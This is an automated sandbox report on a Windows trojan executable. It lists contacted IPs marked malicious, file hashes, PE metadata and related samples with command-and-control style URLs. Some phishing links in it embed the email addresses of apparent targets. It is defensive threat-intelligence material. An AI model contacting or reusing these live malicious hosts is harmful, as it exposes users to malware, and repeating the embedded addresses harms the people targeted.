                                                              http://www.goodfont.co.krexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOCWWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.carterandcone.comlexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.typography.netDexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://fontfabrik.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.searchvity.com/WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.%s.comPAexplorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    low
                                                                    http://www.fonts.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      52.116.52.25
                                                                      unknownUnited States
                                                                      36351SOFTLAYERUStrue
                                                                      107.180.50.162
                                                                      unknownUnited States
                                                                      26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                      104.21.26.55
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      192.185.0.218
                                                                      unknownUnited States
                                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                                      66.96.147.112
                                                                      unknownUnited States
                                                                      29873BIZLAND-SDUStrue
                                                                      5.181.218.55
                                                                      unknownGermany
                                                                      59637ASRSINETRUtrue
                                                                      219.94.203.152
                                                                      unknownJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                      34.102.136.180
                                                                      unknownUnited States
                                                                      15169GOOGLEUStrue
                                                                      67.205.105.239
                                                                      unknownCanada
                                                                      32613IWEB-ASCAtrue
                                                                      198.54.117.244
                                                                      unknownUnited States
                                                                      22612NAMECHEAP-NETUStrue
                                                                      104.18.45.60
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUStrue

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                      Analysis ID:339360
                                                                      Start date:13.01.2021
                                                                      Start time:21:38:16
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 10m 47s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:JdtN8nIcLi8RQOi.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:19
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/1@18/12
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 18.4% (good quality ratio 16.3%)
                                                                      • Quality average: 73.1%
                                                                      • Quality standard deviation: 32.4%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.42.151.234, 51.104.139.180, 92.122.213.194, 92.122.213.247, 93.184.221.240, 52.155.217.156, 20.54.26.129, 52.142.114.176, 51.11.168.160
                                                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, g-msn-com-europe-vip.trafficmanager.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      21:39:16API Interceptor2x Sleep call for process: JdtN8nIcLi8RQOi.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      107.180.50.162P.O-45.exeGet hashmaliciousBrowse
                                                                      • www.kernwide.com/s9zh/?3f=YnOlnZfXtJb&RHR=Ae3+14NK9ZuVfLisH9eKoB22k1V/zcRjzccjQxj5qujlIFw60ODYsyy8qRaOpCDy8Yjl
                                                                      192.185.0.218SEA LION LOGISTICS-URGENT QUOTATION.exeGet hashmaliciousBrowse
                                                                      • www.lfalab.com/oge8/?abvDxBr=UGLAMmk2DZVWnssYuuh7HdOer1dwtGufn/A5XtWCHrl9N+InM5/ONbQG1yxSluBQOtZY&pPU=EFQxUL1HhHpL
                                                                      IMG-033-040.exeGet hashmaliciousBrowse
                                                                      • www.casabreo.com/o56q/?AR-pA8=djItCF3xQPxp&rTdHh=a/qh/A/EtxPC42XtQSw2Uj+1aIgsnoOP4dSPguYoQXjtVYsl8+96mgp2QzxWG2Pq/i+FrqbYbA==
                                                                      vbc.exeGet hashmaliciousBrowse
                                                                      • www.casabreo.com/o56q/?ndlpdH=a/qh/A/EtxPC42XtQSw2Uj+1aIgsnoOP4dSPguYoQXjtVYsl8+96mgp2Qz9WVmDpmy+T&v48p-=1bjHLJKXgdz49L7p
                                                                      DEBIT NOTE DB-1130.exeGet hashmaliciousBrowse
                                                                      • www.volksautomobile.com/ihm3/?sBZ4lrK=7xSN3P7TDi8j49AuzLkYZC2J38lIcTrpxbYKUbA+qkC4Tj6Ie5VvdlxLwD4cHtvztoRkkfBvyQ==&FPcT7b=djCDfFRXOP7H
                                                                      #Uc720#Ud2f0#Uc544#Uc774#Ud14c#Ud06c-#Ubc1c#Uc8fc#Uc11c #Uc1a1#Ubd80#Uc758#Uac74.exe.exeGet hashmaliciousBrowse
                                                                      • www.sunappletree.com/5bs/?1bxdA=S0vP/PVDivLkRGwA5ypirRNC/D8rTRYhUpf7ovNAaT7mu+JDYCYzhMxXJbq/asT2WA9p&LjZh-=iL08qZV
                                                                      RFQ Specification BINIF0866.exeGet hashmaliciousBrowse
                                                                      • www.rescuestack.com/aqu2/?iJE=b/+HScDb2/nnp+wE3H/psFuU30BiVkE+glOeG3timk9xGcZmD+3A21DtxG5D/EoOsBf9&tXR=NZiHaV
                                                                      own.exeGet hashmaliciousBrowse
                                                                      • www.rentabrokers.com/ewbc/?af8LPhIX=xtLJc26/HwvOSljQMCNyJ/8cwZ9CooZtWKyo6WLdOuXzNED74ZrkjeRROQ6kZLHF7KxP&DVm8c=Ylu4sfXHq8_
                                                                      nova narud#U017eba.exeGet hashmaliciousBrowse
                                                                      • www.weddingstatement.com/kvsz/?bpULEn_p=oF9lm8+l/ZCbkrxAB/H8LSeoLTaFub9uhOdqnUiu+xeOE/5xLoVQAJ9NUnetZ3QCZy9f&TbUD3=oH9PHzvXDlnDV
                                                                      14DOC687453456565097665434 PDF.exeGet hashmaliciousBrowse
                                                                      • www.postproduction.online/pe/?5jsx-=jbcDBXuF9v0DHbzHpZadAYMNh9kmJYlTuTExuwX9CIHGLgFRTEYJBUEUsOkByD39uPC++daR5qEYn7FYVO8A&GL0l=pTL4sLjp10X0Kt_p
                                                                      Scaned Contract Ref 4FA444.exeGet hashmaliciousBrowse
                                                                      • www.outstandingapps.com/tr/?id=twaG1VR7vePNrcZCPkw3slwhkZX8Asjdj9KLCM0uHjZ7uVvde9Px6jqMMe9vXpU21JqlUA2sc9G35wFL6ruSBg==&9rj=z8TpS
                                                                      21AZZWCT.exeGet hashmaliciousBrowse
                                                                      • www.elisabethday.com/ol/
                                                                      39NEOY.exeRNOX.exeGet hashmaliciousBrowse
                                                                      • www.elisabethday.com/ol/?id=ghDVzpmfKkjQVBqfz7nwHD+LEA45OcEP6+cZUG6hjNpuWx0z5vFJNMBF8TCggDsDvPLElSrIW+0kHiAX3xmKNw==&8pBXn=0z7pZl18
                                                                      67New Spec. Order.exeGet hashmaliciousBrowse
                                                                      • www.elisabethday.com/ol/?id=ghDVzpmfKkjQVBqfz7nwHD+LEA45OcEP6+cZUG6hjNpuWx0z5vFJNMBF8TCggDsDvPLElSrIW+0kHiAX3xmKNw==&z8Tp=eDfXnp00vJ
                                                                      Transfer Copy.exeGet hashmaliciousBrowse
                                                                      • www.alphonsomurray.com/pc1/?id=DF9x7rmBeyoJ8SdXJ8jgu7bMnMVTskceJwG6BGkVkdctKnT0PtCDqy5wvrFkrkUXeKelqHeGu0VXVVWIEaN-5w..&sql=1
                                                                      56PO 370.exeGet hashmaliciousBrowse
                                                                      • www.vidasuciamc.com/kd/?mh=IrGhLH&7n-=XxIRQjNcAj216WrLmu7/s9//xufkmX8mYhf0TytMYOe2dO/s0MZk17HMCSzagT2Qld1xrq5I47TyVpPBTAAE
                                                                      30order confimation.exeGet hashmaliciousBrowse
                                                                      • www.arepaslatinfood.com/ko/?6lzxw48h=sFwCIgP4ANwoo1PT5mMA/thLg8Ax/ohOVHMGhRV6eEe9v2CcTvPjNoBBY8WFYfM9X/Wl&OJEPeL=nP98bhr0GDMh

                                                                      Domains

                                                                      No context

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUSChrome.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.232
                                                                      QPR-1064.pdf.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      Matrix.exeGet hashmaliciousBrowse
                                                                      • 172.67.134.127
                                                                      JAAkR51fQY.exeGet hashmaliciousBrowse
                                                                      • 104.21.13.175
                                                                      cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      VANGUARD PAYMENT ADVICE.htmGet hashmaliciousBrowse
                                                                      • 104.31.67.162
                                                                      IMG_2021_01_13_1_RFQ_PO_1832938.docGet hashmaliciousBrowse
                                                                      • 104.28.5.151
                                                                      IMG_2021_01_13_1_RFQ_PO_1832938.exeGet hashmaliciousBrowse
                                                                      • 104.28.4.151
                                                                      sample20210113-01.xlsmGet hashmaliciousBrowse
                                                                      • 104.24.124.127
                                                                      Byrnes Gould PLLC.odtGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      aNmkT4KLJX.exeGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                                                      • 104.18.49.20
                                                                      brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      Pokana2021011357.docGet hashmaliciousBrowse
                                                                      • 172.67.195.152
                                                                      09000000000000h.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      PO#218740.exeGet hashmaliciousBrowse
                                                                      • 172.67.164.253
                                                                      PO-5042.exeGet hashmaliciousBrowse
                                                                      • 104.28.4.151
                                                                      PO-000202112.exeGet hashmaliciousBrowse
                                                                      • 172.67.151.49
                                                                      20210113155320.exeGet hashmaliciousBrowse
                                                                      • 66.235.200.145
                                                                      13012021.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      SOFTLAYERUSiGet hashmaliciousBrowse
                                                                      • 67.19.147.226
                                                                      http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                      • 159.253.128.188
                                                                      Audio_47720.wavv - - Copy.htmGet hashmaliciousBrowse
                                                                      • 158.176.79.200
                                                                      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffdd20158061a40259d693dea2ef9e1a5.svc.dynamics.com%2ft%2fr%2fK7SXmXZktiYcLfGnV8W6kGbWfZ8XPa0UR5w2NZxfqT8%23paul.scott%40growwithfnb.com%3a3893%3d3&c=E,1,9l-G5uJVDWDU8_wOtjfPvUbxvV9wTD-85X3TIVaryjCSjAnd5Je-5QjgYqWMGifoOmLqLqsarlv-jRvivFnFGLD08lo9MjB3LxBx-DYDF6fhZ2OF&typo=1Get hashmaliciousBrowse
                                                                      • 158.175.115.200
                                                                      http://getfreshnews.com/nuoazaojrnvenpyxyseGet hashmaliciousBrowse
                                                                      • 159.253.128.183
                                                                      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f31c462c0f45d449c88055b8c23df7863.svc.dynamics.com%2ft%2fr%2fIofGGuGvOuh_i3k4U-jBzfE1u1yg9kHPBS0stRfoX3U%23rbartel%40murexltd.com%3a380%3d009&c=E,1,xP0RSUBtZVNwakaYXBLYnh2Aer2HVIwJdidGVeOhulL1sp9Nz6ix3XUeizBZxcVT0pOPcjsfxu1c2ehXg7iv-OghYMiZvZIGOr0QzAyBnhA8vRMsgY35uBOS2A,,&typo=1Get hashmaliciousBrowse
                                                                      • 169.46.89.154
                                                                      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f31c462c0f45d449c88055b8c23df7863.svc.dynamics.com%2ft%2fr%2fIofGGuGvOuh_i3k4U-jBzfE1u1yg9kHPBS0stRfoX3U%23mgalaviz%40murexltd.com%3a380%3d009&c=E,1,LMuEnBQUsm17bMEtLoMTU2ivZg9c10KfgK_E949LlJ5Zl-hL3DPxXCJN5T4Fcv7bFlAxGYjEjJS64lSY648yLvhn5eRhmGjqvD2BRBLFeyCaZLqWxIP2keZJqOE,&typo=1Get hashmaliciousBrowse
                                                                      • 169.46.89.154
                                                                      https://sharepointsfile.eu-gb.cf.appdomain.cloud/redirect/?param=YW50d2VycGVuLmNlbnRydW1AY20uYmU=Get hashmaliciousBrowse
                                                                      • 158.176.79.200
                                                                      utox.exeGet hashmaliciousBrowse
                                                                      • 85.203.45.12
                                                                      s1jFCdRJWD.exeGet hashmaliciousBrowse
                                                                      • 172.111.192.30
                                                                      https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                                                      • 159.8.107.254
                                                                      SMA121920.exeGet hashmaliciousBrowse
                                                                      • 52.117.211.114
                                                                      New Vendor - Setup Form.exeGet hashmaliciousBrowse
                                                                      • 50.97.186.163
                                                                      https://sharia-point.us-south.cf.appdomain.cloud/redirect/?email=Kristine_Bridges@baylor.edu&data=04|01|Kristine_Bridges@baylor.edu|a64194d2378542e06dfc08d8a2802868|22d2fb35256a459bbcf4dc23d42dc0a4|0|0|637438018615913999|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|0&sdata=smYCgJbR96G/HzImvOXjT6991bTFo5/ZZGjJwucJySM=&reserved=0Get hashmaliciousBrowse
                                                                      • 169.62.254.82
                                                                      https://survey.alchemer.com/s3/6089047/Contract-AddendumGet hashmaliciousBrowse
                                                                      • 169.50.137.190
                                                                      https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                                                                      • 169.50.137.190
                                                                      https://greens.us-south.cf.appdomain.cloud/smain/?op=c2FsZXNAZm9yZHdheS5jb20=&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488Get hashmaliciousBrowse
                                                                      • 169.46.89.154
                                                                      rtgs_pdf.exeGet hashmaliciousBrowse
                                                                      • 50.97.186.164
                                                                      https://feeds.eu-gb.cf.appdomain.cloud/redirect/?email=sales@fordway.comGet hashmaliciousBrowse
                                                                      • 141.125.73.152
                                                                      https://901c5967cfa749e4868ebfd8398c3885.svc.dynamics.com/t/r/Q7S69AKU5cfMdZm6Wiy7rVvSMcARpFDrhoPhruYRCXQ#billsgates@apple.com:9ef73999=00Get hashmaliciousBrowse
                                                                      • 169.47.124.25
                                                                      AS-26496-GO-DADDY-COM-LLCUS20210113432.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      YvGnm93rap.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      13-01-21.xlsxGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      20210111 Virginie.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Documento.docGet hashmaliciousBrowse
                                                                      • 107.180.2.39
                                                                      5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                      • 192.169.223.13
                                                                      cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Project review_Pdf.exeGet hashmaliciousBrowse
                                                                      • 107.180.44.126
                                                                      Revise Order.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Info.docGet hashmaliciousBrowse
                                                                      • 107.180.2.39
                                                                      mensaje.docGet hashmaliciousBrowse
                                                                      • 107.180.2.39
                                                                      PO890299700006.xlsxGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Consignment Details.exeGet hashmaliciousBrowse
                                                                      • 166.62.10.185
                                                                      yaQjVEGNEb.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      Purchase Order -263.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241
                                                                      order no. 43453.exeGet hashmaliciousBrowse
                                                                      • 198.71.232.3
                                                                      btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                      • 184.168.131.241

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.log
                                                                      Process:C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):525
                                                                      Entropy (8bit):5.2874233355119316
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                                      MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                                      SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                                      SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                                      SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.165394379826869
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:JdtN8nIcLi8RQOi.exe
                                                                      File size:842240
                                                                      MD5:aee550440966b0bd34d9ccb2b1f7f146
                                                                      SHA1:14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
                                                                      SHA256:d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
                                                                      SHA512:7a81e4fec8c21339eb051205ad5a84fd3db07b4e330b9911b740d1382f4a084b812217312ec3e97a63ffc22ea260a7f2a2d9c8fc463881cabf7d2392e038d894
                                                                      SSDEEP:12288:XkIYTA00cOkUWBGzW9R5h2ZDilvWozrGX:KWUGz6hMDsWozK
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P.................. ........@.. .......................@............@................................

                                                                      File Icon

                                                                      Icon Hash:0659d8d4dcd8134c

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4be4c6
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5FFF05FC [Wed Jan 13 14:38:52 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v2.0.50727
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
